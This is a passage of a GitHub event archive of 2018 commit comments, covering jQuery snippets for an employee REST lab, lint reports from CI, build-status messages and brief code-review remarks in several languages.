/>\r\n+\t<br />\r\n+\r\n+\r\n+\t<button id=\"btnSubmit\">Submit</button>\r\n+\r\n+</body>\r\n\r\n----------------------------------------------------\r\n\r\n<script type=\"text/javascript\">\r\n+\t$.ajax({\r\n+\t\ttype : 'GET',\r\n+\t\turl : 'http://localhost:8002/RESTDBLab1/rest/emp/employee/',\r\n+\r\n+\t\tdataType : 'json',\r\n+\r\n+\t\tsuccess : function(data) {\r\n+\r\n+\t\t\tdrawTable(data);\r\n+\t\t}\r\n+\t});\r\n+\tfunction drawTable(data) {\r\n+\t\tfor (var i = 0; i < data.length; i++) {\r\n+\r\n+\t\t\tvar row = $(\"<tr />\")\r\n+\t\t\tconsole.log(data[i]);\r\n+\t\t\t$(\"#personDataTable\").append(row); //this will append tr element to table... keep its reference for a while since we will add cels into it\r\n+\t\t\trow.append($(\"<td>\" + data[i].id + \"</td>\"));\r\n+\t\t\trow.append($(\"<td>\" + data[i].name + \"</td>\"));\r\n+\t\t\trow.append($(\"<td>\" + data[i].designation + \"</td>\"));\r\n+\t\t\trow.append($(\"<td>\" + data[i].salary + \"</td>\"));\r\n+\t\t\trow.append($(\"<td>\" + data[i].address.doorno + \"</td>\"));\r\n+\t\t\trow.append($(\"<td>\" + data[i].address.street + \"</td>\"));\r\n+\t\t\trow.append($(\"<td>\" + data[i].address.location + \"</td>\"));\r\n+\t\t\trow.append($(\"<td>\" + data[i].address.city + \"</td>\"));\r\n+\t\t}\r\n+\t}\r\n+</script>\r\n+\r\n+<body>\r\n+\r\n+\t<table id=\"personDataTable\" border=\"10px\">\r\n+\t\t<tr>\r\n+\t\t\t<th>Id</th>\r\n+\t\t\t<th>Name</th>\r\n+\t\t\t<th>Designation</th>\r\n+\t\t\t<th>Salary</th>\r\n+\t\t\t<th>doorno</th>\r\n+\t\t\t<th>street</th>\r\n+\t\t\t<th>location</th>\r\n+\t\t\t<th>city</th>\r\n+\t\t</tr>\r\n+\t</table>\r\n+\r\n+\r\n+</body>\r\n+</html> \r\n \r\n-----------------------------------------------------------\r\n\r\n+<script type=\"text/javascript\">\r\n+\t$(document).ready(function() {\r\n+\t\t$(\"#btnSubmit\").click(viewEmpList);\r\n+\t});\r\n+\tfunction viewEmpList() {\r\n+\r\n+\t\t$.ajax({\r\n+\t\t\ttype : 'GET',\r\n+\r\n+\t\t\turl : 'http://localhost:8002/RESTDBLab1/rest/emp/employee/'\r\n+\t\t\t\t\t+ $('#viewId').val(),\r\n+\r\n+\t\t\tdataType : 'json',\r\n+\r\n+\t\t\tsuccess : function(data) {\r\n+\t\t\t\tdrawTable(data);\r\n+\r\n+\t\t\t},\r\n+\t\t\terror : function(jqXHR, textStatus, errorThrown) {\r\n+\t\t\t\talert('Employee Record error');\r\n+\t\t\t}\r\n+\t\t});\r\n+\t}\r\n+\tfunction drawTable(data) {\r\n+\t\tfor (var i = 0; i < data.length; i++) {\r\n+\r\n+\t\t\tvar row = $(\"<tr />\")\r\n+\t\t\tconsole.log('alert inside drawtable');\r\n+\t\t\tconsole.log(data[i]);\r\n+\t\t\t$(\"#empDataTable\").append(row);\r\n+\t\t\trow.append($(\"<td>\" + data[i].id + \"</td>\"));\r\n+\t\t\trow.append($(\"<td>\" + data[i].name + \"</td>\"));\r\n+\t\t\trow.append($(\"<td>\" + data[i].designation + \"</td>\"));\r\n+\t\t\trow.append($(\"<td>\" + data[i].salary + \"</td>\"));\r\n+\t\t\trow.append($(\"<td>\" + data[i].address.doorno + \"</td>\"));\r\n+\t\t\trow.append($(\"<td>\" + data[i].address.street + \"</td>\"));\r\n+\t\t\trow.append($(\"<td>\" + data[i].address.location + \"</td>\"));\r\n+\t\t\trow.append($(\"<td>\" + data[i].address.city + \"</td>\"));\r\n+\t\t}\r\n+\t}\r\n+\t$(document).ready(function() {\r\n+\t\t$('#btnRefresh').click(function() {\r\n+\t\t\tlocation.reload();\r\n+\t\t});\r\n+\t});\r\n+</script>\r\n+\r\n+<body>\r\n+\r\n+\r\n+\t<input id=\"viewId\" name=\"id\" type=\"text\" />\r\n+\r\n+\r\n+\t<button id=\"btnSubmit\">Submit</button>\r\n+\r\n+\r\n+\t<br />\r\n+\t<br />\r\n+\r\n+\r\n+\t<table id=\"empDataTable\" border=\"10px\">\r\n+\t\t<tr>\r\n+\t\t\t<th>Id</th>\r\n+\t\t\t<th>Name</th>\r\n+\t\t\t<th>Designation</th>\r\n+\t\t\t<th>Salary</th>\r\n+\t\t\t<th>doorno</th>\r\n+\t\t\t<th>street</th>\r\n+\t\t\t<th>location</th>\r\n+\t\t\t<th>city</th>\r\n+\t\t</tr>\r\n+\t</table>\r\n+\t<br />\r\n+\t<button id=\"btnRefresh\">Refresh</button>\r\n+\r\n+</body>\r\n\r\n----------------------------------------------------\r\n\r\n<script type=\"text/javascript\">\r\n+\t$(document).ready(function() {\r\n+\t\t$(\"#btnUpdate\").click(updateEmpRecord);\r\n+\t});\r\n+\r\n+\tfunction updateEmpRecord() {\r\n+\r\n+\t\t$.ajax({\r\n+\t\t\ttype : 'PUT',\r\n+\t\t\turl : 'http://localhost:8002/RESTDBLab1/rest/emp/employee/'\r\n+\t\t\t\t\t+ $('#viewId').val(),\r\n+\t\t\tdataType : \"json\",\r\n+\t\t\tdata : formToJSON(),\r\n+\t\t\tsuccess : function(data) {\r\n+\r\n+\t\t\t\talert(updatedone);\r\n+\t\t\t}\r\n+\t\t});\r\n+\t}\r\n+\r\n+\tfunction formToJSON() {\r\n+\r\n+\t\treturn JSON.stringify({\r\n+\r\n+\t\t\t\"name\" : $('#empName').val(),\r\n+\t\t\t\"designation\" : $('#empDesignation').val(),\r\n+\t\t\t\"salary\" : $('#empSalary').val(),\r\n+\t\t\t\"address\" : {\r\n+\t\t\t\t\"doorno\" : $('#empDoorno').val(),\r\n+\t\t\t\t\"street\" : $('#empStreet').val(),\r\n+\t\t\t\t\"location\" : $('#empLocation').val(),\r\n+\t\t\t\t\"city\" : $('#empCity').val()\r\n+\t\t\t}\r\n+\t\t});\r\n+\r\n+\t}\r\n+</script>\r\n+\r\n+<body>\r\n+\r\n+\tEnter the Id\r\n+\t<input id=\"viewId\" name=\"id\" type=\"text\" />\r\n+\t<br /> Name:\r\n+\t<input id=\"empName\" name=\"id\" type=\"text\" />\r\n+\t<br /> Designation:\r\n+\t<input id=\"empDesignation\" name=\"design\" type=\"text\" />\r\n+\t<br /> Salary:\r\n+\t<input id=\"empSalary\" name=\"sal\" type=\"text\" />\r\n+\t<br /> Door Number:\r\n+\t<input id=\"empDoorno\" name=\"doorNo\" type=\"text\" />\r\n+\t<br /> Street:\r\n+\t<input id=\"empStreet\" name=\"street\" type=\"text\" />\r\n+\t<br /> Location:\r\n+\t<input id=\"empLocation\" name=\"loc\" type=\"text\" />\r\n+\t<br /> City:\r\n+\t<input id=\"empCity\" name=\"city\" type=\"text\" />\r\n+\t<br />\r\n+\r\n+\r\n+\t<button id=\"btnUpdate\">Update</button>\r\n+\r\n+\r\n+</body>\r\n\r\n-----------------------------------------\r\n"}},"created_at":"2018-07-03T09:40:09Z"}
{"id":"7911415415","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"akoumjian/b9labs-remittance"},"payload":{"comment":{"id":29577947,"position":19,"line":40,"path":"contracts/Remittance.sol","commit_id":"795839d720f8e857702664ba9810290dad2c66d4","created_at":"2018-07-03T09:40:16Z","updated_at":"2018-07-03T09:40:16Z","author_association":"NONE","body":"Yes. `uint` is a value type, so there is no reference to it.\r\nYou should tag one of us otherwise we do not know you commented here."}},"created_at":"2018-07-03T09:40:16Z"}
{"id":"7911416977","type":"CommitCommentEvent","actor":{"login":"gnomengineer"},"repo":{"name":"gnomengineer/qtsat"},"payload":{"comment":{"id":29577950,"position":null,"line":null,"path":null,"commit_id":"cc63c528e56a12f09af31b76c5ac30b8a770e9c4","created_at":"2018-07-03T09:40:32Z","updated_at":"2018-07-03T09:40:32Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Requirements Engineering](https://trello.com/c/03FzQ8gU/2-requirements-engineering)"}},"created_at":"2018-07-03T09:40:32Z"}
{"id":"7911420196","type":"CommitCommentEvent","actor":{"login":"osallou"},"repo":{"name":"BioContainers/containers"},"payload":{"comment":{"id":29577959,"position":null,"line":null,"path":null,"commit_id":"67ce2b9cc33f86f6c93c6e9bac15ba070b29ae33","created_at":"2018-07-03T09:41:09Z","updated_at":"2018-07-03T09:41:09Z","author_association":"CONTRIBUTOR","body":"No mindthegap/2.0.1/test-cmds.txt (test file) present, skipping tests"}},"created_at":"2018-07-03T09:41:09Z"}
{"id":"7911420482","type":"CommitCommentEvent","actor":{"login":"mkosturkov"},"repo":{"name":"kiboit/phast"},"payload":{"comment":{"id":29577960,"position":null,"line":null,"path":null,"commit_id":"246ecf5183e67764bbad882db71328338293aed0","created_at":"2018-07-03T09:41:11Z","updated_at":"2018-07-03T09:41:11Z","author_association":"MEMBER","body":"True. It was there due to trippin' on my side. "}},"created_at":"2018-07-03T09:41:11Z"}
{"id":"7911427090","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":29577979,"position":null,"line":null,"path":null,"commit_id":"33bd03feb6b4151e55cd2098154662c0817705ec","created_at":"2018-07-03T09:42:23Z","updated_at":"2018-07-03T09:42:23Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.namedfile/92/violations\n```\nplone/namedfile/testing.py:18:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/namedfile/testing.py:22:36: C812 missing trailing comma\nplone/namedfile/file.py:267:9: Q001 Remove bad quotes from multiline string.\nplone/namedfile/file.py:308:9: Q001 Remove bad quotes from multiline string.\nplone/namedfile/handler.py:11:23: C812 missing trailing comma\nplone/namedfile/interfaces.py:17:25: C812 missing trailing comma\nplone/namedfile/scaling.py:193:25: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:196:5: C901 'DefaultImageScalingFactory.__call__' is too complex (15)\nplone/namedfile/scaling.py:203:25: C816 missing trailing comma in Python 3.6+\nplone/namedfile/scaling.py:243:29: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:407:21: C816 missing trailing comma in Python 3.6+\nplone/namedfile/scaling.py:434:25: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:446:25: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:460:21: C816 missing trailing comma in Python 3.6+\nplone/namedfile/scaling.py:486:29: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:500:17: C816 missing trailing comma in Python 3.6+\nplone/namedfile/utils/__init__.py:84:66: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:151:15: T000 Todo note found.\nplone/namedfile/utils/__init__.py:156:73: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:176:15: T000 Todo note found.\nplone/namedfile/utils/__init__.py:183:18: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:188:1: C901 'rotate_image' is too complex (20)\nplone/namedfile/utils/__init__.py:219:14: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:271:25: F821 undefined name 'StringIO'\nplone/namedfile/utils/__init__.py:276:1: E302 expected 2 blank lines, found 1\nplone/namedfile/utils/__init__.py:280:1: E302 expected 2 blank lines, found 1\nplone/namedfile/utils/tiff_utils.py:11:1: C901 'process_tiff' is too complex (11)\nplone/namedfile/utils/tiff_utils.py:20:7: T000 Todo note found.\nplone/namedfile/utils/tiff_utils.py:81:7: T000 Todo note found.\nplone/namedfile/utils/tiff_utils.py:82:7: T000 Todo note found.\nplone/namedfile/tests/test_blobfile.py:40:31: C812 missing trailing comma\nplone/namedfile/tests/test_blobfile.py:45:35: C812 missing trailing comma\nplone/namedfile/tests/test_blobfile.py:50:46: C812 missing trailing comma\nplone/namedfile/tests/test_blobfile.py:55:32: C812 missing trailing comma\nplone/namedfile/tests/test_scaling.py:85:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:102:80: E501 line too long (81 > 79 characters)\nplone/namedfile/tests/test_scaling.py:133:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:156:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:178:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:200:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_image.py:25:80: E501 line too long (80 > 79 characters)\nplone/namedfile/tests/test_doctests.py:27:20: C812 missing trailing comma\nplone/namedfile/tests/test_doctests.py:43:51: C812 missing trailing comma\nplone/namedfile/tests/test_doctests.py:45:10: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:116:28: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:146:70: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:153:76: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:164:74: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:197:75: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:202:78: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-03T09:42:23Z"}
{"id":"7911429912","type":"CommitCommentEvent","actor":{"login":"lesego48"},"repo":{"name":"lesego48/hello-world"},"payload":{"comment":{"id":29577993,"position":null,"line":null,"path":null,"commit_id":"dfd699ceb7274acdbbbae4d2191d095cfb07f343","created_at":"2018-07-03T09:42:55Z","updated_at":"2018-07-03T09:42:55Z","author_association":"OWNER","body":"comment for hallo text\r\n"}},"created_at":"2018-07-03T09:42:55Z"}
{"id":"7911430553","type":"CommitCommentEvent","actor":{"login":"renwokuang"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":29577994,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2018-07-03T09:43:03Z","updated_at":"2018-07-03T09:43:03Z","author_association":"NONE","body":"token又封了"}},"created_at":"2018-07-03T09:43:03Z"}
{"id":"7911431953","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29577997,"position":278,"line":514,"path":"tests/qgraph/test-qgraph.c","commit_id":"1bcb88e173970ab3e1c2362ee631e64691b1eb02","created_at":"2018-07-03T09:43:19Z","updated_at":"2018-07-03T09:43:19Z","author_association":"NONE","body":"Where is `qpci_set_pc` called? I wouldn't have expected it to be called from these tests (thinking that the constructor for the machine is outside the scope of these unit tests).\r\n\r\nHowever, we could also move the assertion in qpci_init_pc (kind of cheating, but less ugly than `0xffffffff`. :)"}},"created_at":"2018-07-03T09:43:19Z"}
{"id":"7911434833","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29578003,"position":33,"line":215,"path":"1-Osnovy-Ruby-polnaya-PO/lesson4/interface.rb","commit_id":"bc47bfc52f811038ebf6e3a37f94a823eed21608","created_at":"2018-07-03T09:43:50Z","updated_at":"2018-07-03T09:43:50Z","author_association":"OWNER","body":"No vrod razobralsya...rabotaet)"}},"created_at":"2018-07-03T09:43:50Z"}
{"id":"7911436072","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"akoumjian/b9labs-remittance"},"payload":{"comment":{"id":29578006,"position":7,"line":33,"path":"contracts/Remittance.sol","commit_id":"795839d720f8e857702664ba9810290dad2c66d4","created_at":"2018-07-03T09:44:04Z","updated_at":"2018-07-03T09:44:04Z","author_association":"NONE","body":"`bytes32 password` will be just as good."}},"created_at":"2018-07-03T09:44:04Z"}
{"id":"7911440783","type":"CommitCommentEvent","actor":{"login":"alium"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29578011,"position":null,"line":null,"path":null,"commit_id":"2d35907f109e2256fdb11a322dfcfe68a0cbf442","created_at":"2018-07-03T09:44:54Z","updated_at":"2018-07-03T09:44:54Z","author_association":"CONTRIBUTOR","body":" jenkins produced corrupted (invalid or corrupted package (PGP signature)) package, why? :-("}},"created_at":"2018-07-03T09:44:54Z"}
{"id":"7911441209","type":"CommitCommentEvent","actor":{"login":"lamuert3"},"repo":{"name":"lamuert3/Projects"},"payload":{"comment":{"id":29578012,"position":1,"line":1,"path":"C/Huffman Tree/a","commit_id":"d53298a8f9eda064409f6474127ae145ac1aae1f","created_at":"2018-07-03T09:44:59Z","updated_at":"2018-07-03T09:44:59Z","author_association":"OWNER","body":"C++"}},"created_at":"2018-07-03T09:44:59Z"}
{"id":"7911441382","type":"CommitCommentEvent","actor":{"login":"rasple"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29578014,"position":null,"line":null,"path":null,"commit_id":"220f59c329f8d3dd4b32e445c52a345de5335156","created_at":"2018-07-03T09:45:02Z","updated_at":"2018-07-03T09:45:02Z","author_association":"OWNER","body":"Voll gut gemacht Frank!"}},"created_at":"2018-07-03T09:45:02Z"}
{"id":"7911442523","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IlyaDvortsevoy/NET.S.2018.Dvortsevoy.03"},"payload":{"comment":{"id":29578016,"position":20,"line":20,"path":"Algorithm/Algorithms.cs","commit_id":"6ba7cc4776c93ca5037d68d61dc1c93e71fba8cd","created_at":"2018-07-03T09:45:14Z","updated_at":"2018-07-03T09:45:14Z","author_association":"NONE","body":"- по-прежнему, выполнен комит лишних файлов!\r\n- нет валидации формальных параметров\r\n- округление полученного результата категорически здесь не приветствуется, поскольку не имеет смысла\r\n- соответственно переменная fractionalPart не нужна"}},"created_at":"2018-07-03T09:45:14Z"}
{"id":"7911451151","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29578044,"position":84,"line":18,"path":"pom.xml","commit_id":"cc0f84e819c958cb76e6f16449bd49cc757fe092","created_at":"2018-07-03T09:46:44Z","updated_at":"2018-07-03T09:46:44Z","author_association":"COLLABORATOR","body":"Вынести в блок <properties>\r\n"}},"created_at":"2018-07-03T09:46:44Z"}
{"id":"7911458284","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29578059,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-03T09:48:02Z","updated_at":"2018-07-03T09:48:02Z","author_association":"OWNER","body":"\r\n{ENTER}\r\n[f03072018094749_download.txt](https://github.com/githubuserdlp/TEST/files/2158665/f03072018094749_download.txt)\r\n"}},"created_at":"2018-07-03T09:48:02Z"}
{"id":"7911458490","type":"CommitCommentEvent","actor":{"login":"mutasim1438"},"repo":{"name":"mutasim1438/myjenkins"},"payload":{"comment":{"id":29578060,"position":null,"line":null,"path":null,"commit_id":"0b415fb557724cefeb130a216a7c99e0157895a7","created_at":"2018-07-03T09:48:05Z","updated_at":"2018-07-03T09:48:05Z","author_association":"OWNER","body":"it happens"}},"created_at":"2018-07-03T09:48:05Z"}
{"id":"7911461389","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29578064,"position":13,"line":10,"path":"src/main/java/com/agurova/dal/impl/ImageRepoImpl.java","commit_id":"cc0f84e819c958cb76e6f16449bd49cc757fe092","created_at":"2018-07-03T09:48:36Z","updated_at":"2018-07-03T09:48:36Z","author_association":"COLLABORATOR","body":"Code style. "}},"created_at":"2018-07-03T09:48:36Z"}
{"id":"7911463243","type":"CommitCommentEvent","actor":{"login":"haraldh"},"repo":{"name":"varlink/rust"},"payload":{"comment":{"id":29578072,"position":null,"line":null,"path":null,"commit_id":"b19e50128900d3aa10617e61f972217ec27c20e3","created_at":"2018-07-03T09:48:57Z","updated_at":"2018-07-03T09:48:57Z","author_association":"COLLABORATOR","body":":smile: "}},"created_at":"2018-07-03T09:48:57Z"}
{"id":"7911468472","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29578086,"position":84,"line":18,"path":"pom.xml","commit_id":"cc0f84e819c958cb76e6f16449bd49cc757fe092","created_at":"2018-07-03T09:49:57Z","updated_at":"2018-07-03T09:49:57Z","author_association":"COLLABORATOR","body":"Удалить комменты к зависимостям"}},"created_at":"2018-07-03T09:49:57Z"}
{"id":"7911472380","type":"CommitCommentEvent","actor":{"login":"FlinteW"},"repo":{"name":"FlinteW/udemy-heroes"},"payload":{"comment":{"id":29578093,"position":null,"line":null,"path":null,"commit_id":"5802efcaf1f7cfb3986d96781ab094731299b73d","created_at":"2018-07-03T09:50:39Z","updated_at":"2018-07-03T09:50:39Z","author_association":"OWNER","body":"Perfecto, cambios ok 🍄 "}},"created_at":"2018-07-03T09:50:39Z"}
{"id":"7911474878","type":"CommitCommentEvent","actor":{"login":"hklcf"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":29578103,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2018-07-03T09:51:07Z","updated_at":"2018-07-03T09:51:07Z","author_association":"OWNER","body":"有興趣可以電郵我研究 hklcf.github@hkit.club"}},"created_at":"2018-07-03T09:51:07Z"}
{"id":"7911476000","type":"CommitCommentEvent","actor":{"login":"stashinskii"},"repo":{"name":"stashinskii/NET.S.2018.Stashynski.03"},"payload":{"comment":{"id":29578107,"position":38,"line":42,"path":"NewtonMethod/NewtonMethod.cs","commit_id":"eab323631840c0dd8b395727bfa1bfd3bc2f2155","created_at":"2018-07-03T09:51:19Z","updated_at":"2018-07-03T09:51:19Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-03T09:51:19Z"}
{"id":"7911476466","type":"CommitCommentEvent","actor":{"login":"stashinskii"},"repo":{"name":"stashinskii/NET.S.2018.Stashynski.03"},"payload":{"comment":{"id":29578109,"position":44,"line":48,"path":"NewtonMethod/NewtonMethod.cs","commit_id":"eab323631840c0dd8b395727bfa1bfd3bc2f2155","created_at":"2018-07-03T09:51:24Z","updated_at":"2018-07-03T09:51:24Z","author_association":"OWNER","body":"done "}},"created_at":"2018-07-03T09:51:24Z"}
{"id":"7911477055","type":"CommitCommentEvent","actor":{"login":"hklcf"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":29578111,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2018-07-03T09:51:30Z","updated_at":"2018-07-03T09:51:30Z","author_association":"OWNER","body":"@renwokuang 對T_T"}},"created_at":"2018-07-03T09:51:30Z"}
{"id":"7911477457","type":"CommitCommentEvent","actor":{"login":"l2dy"},"repo":{"name":"mquinson/po4a"},"payload":{"comment":{"id":29578113,"position":5,"line":183,"path":"CONTRIBUTING.md","commit_id":"df79e8c6c2088b6528f0082a1ede4adf58de10cb","created_at":"2018-07-03T09:51:34Z","updated_at":"2018-07-03T09:51:34Z","author_association":"CONTRIBUTOR","body":"Markdown links support optional titles, e.g. `[an example](http://example.com/ \"Title\")`, so it probably won't make any difference. But why not keep them consistent (revert this or update other links as well)?"}},"created_at":"2018-07-03T09:51:34Z"}
{"id":"7911478111","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29578114,"position":8,"line":8,"path":"tests/HelloWorldTest.php","commit_id":"7ed44125b9095290ab926eead6392cb4ceb9ff39","created_at":"2018-07-03T09:51:41Z","updated_at":"2018-07-03T09:51:41Z","author_association":"OWNER","body":"If I've got it correctly, this is how phpunit 7.1 works when testing output like echo and print. Otherwise, a command like $ ../vendor/bin/phpunit HelloWorldTest would give us a failed test response. I think I need a hint to make this in another way."}},"created_at":"2018-07-03T09:51:41Z"}
{"id":"7911478262","type":"CommitCommentEvent","actor":{"login":"stashinskii"},"repo":{"name":"stashinskii/NET.S.2018.Stashynski.03"},"payload":{"comment":{"id":29578115,"position":18,"line":22,"path":"NewtonMethod/NewtonMethod.cs","commit_id":"eab323631840c0dd8b395727bfa1bfd3bc2f2155","created_at":"2018-07-03T09:51:43Z","updated_at":"2018-07-03T09:51:43Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-03T09:51:43Z"}
{"id":"7911479288","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29578119,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-03T09:51:54Z","updated_at":"2018-07-03T09:51:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T09:51:54Z"}
{"id":"7911480194","type":"CommitCommentEvent","actor":{"login":"massvoice"},"repo":{"name":"rneurink/Ultimaker2Marlin"},"payload":{"comment":{"id":29578124,"position":null,"line":null,"path":null,"commit_id":"64bcdd6f360674a70c79fee844bccbd37d601b75","created_at":"2018-07-03T09:52:05Z","updated_at":"2018-07-03T09:52:05Z","author_association":"NONE","body":"Hi, Sure.  \r\n![img_20180625_153746](https://user-images.githubusercontent.com/7834974/42212790-7668c338-7eb7-11e8-94b4-9e40c71060aa.jpg)\r\n"}},"created_at":"2018-07-03T09:52:05Z"}
{"id":"7911483776","type":"CommitCommentEvent","actor":{"login":"tiendat81"},"repo":{"name":"tiendat81/Demo"},"payload":{"comment":{"id":29578129,"position":null,"line":null,"path":null,"commit_id":"e9d391005dcc81c9487e45be52631fe0fe7cccb5","created_at":"2018-07-03T09:52:43Z","updated_at":"2018-07-03T09:52:43Z","author_association":"OWNER","body":"Test Jenkins\r\n"}},"created_at":"2018-07-03T09:52:43Z"}
{"id":"7911488158","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IlyaDvortsevoy/NET.S.2018.Dvortsevoy.03"},"payload":{"comment":{"id":29578138,"position":25,"line":25,"path":"CompareRealization/AlgorithmVariants.cs","commit_id":"6ba7cc4776c93ca5037d68d61dc1c93e71fba8cd","created_at":"2018-07-03T09:53:32Z","updated_at":"2018-07-03T09:53:32Z","author_association":"NONE","body":"- Валидацию логично было бы поместить  до выполнения каких-либо действий"}},"created_at":"2018-07-03T09:53:32Z"}
{"id":"7911488165","type":"CommitCommentEvent","actor":{"login":"IBRAHIMUAE"},"repo":{"name":"IBRAHIMUAE/my-travel-plans"},"payload":{"comment":{"id":29578139,"position":23,"line":23,"path":"css/app.css","commit_id":"413e310394707d5660853963a8b6fe5ddaef75f7","created_at":"2018-07-03T09:53:32Z","updated_at":"2018-07-03T09:53:32Z","author_association":"OWNER","body":".destination:hoverh2 {\r\n   transform:rotate(0deg);\r\n}\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-03T09:53:32Z"}
{"id":"7911489922","type":"CommitCommentEvent","actor":{"login":"zhangbei59"},"repo":{"name":"zhangbei59/zabbix_templates"},"payload":{"comment":{"id":29578144,"position":null,"line":null,"path":null,"commit_id":"0122164f0fa27f9667d5e1d6d53c56dc9a51cdfa","created_at":"2018-07-03T09:53:52Z","updated_at":"2018-07-03T09:53:52Z","author_association":"OWNER","body":"zabbix percona mysql监控"}},"created_at":"2018-07-03T09:53:52Z"}
{"id":"7911490449","type":"CommitCommentEvent","actor":{"login":"IBRAHIMUAE"},"repo":{"name":"IBRAHIMUAE/my-travel-plans"},"payload":{"comment":{"id":29578145,"position":null,"line":null,"path":null,"commit_id":"413e310394707d5660853963a8b6fe5ddaef75f7","created_at":"2018-07-03T09:53:58Z","updated_at":"2018-07-03T09:53:58Z","author_association":"OWNER","body":".destination:hoverh2 {\r\n   transform:rotate(0deg);\r\n}\r\nh2 {\r\n   margin : 0;\r\n   transform : rotate(-45deg);\r\n   transition : transform 0.5s;\r\n   text-shadow : 0 0 5px #01579b;\r\n}"}},"created_at":"2018-07-03T09:53:58Z"}
{"id":"7911491334","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IlyaDvortsevoy/NET.S.2018.Dvortsevoy.03"},"payload":{"comment":{"id":29578149,"position":39,"line":39,"path":"CompareRealization/AlgorithmVariants.cs","commit_id":"6ba7cc4776c93ca5037d68d61dc1c93e71fba8cd","created_at":"2018-07-03T09:54:08Z","updated_at":"2018-07-03T09:54:08Z","author_association":"NONE","body":"- эта часть логики достойна быть выделенной в отдельный говорящий что он делает метод"}},"created_at":"2018-07-03T09:54:08Z"}
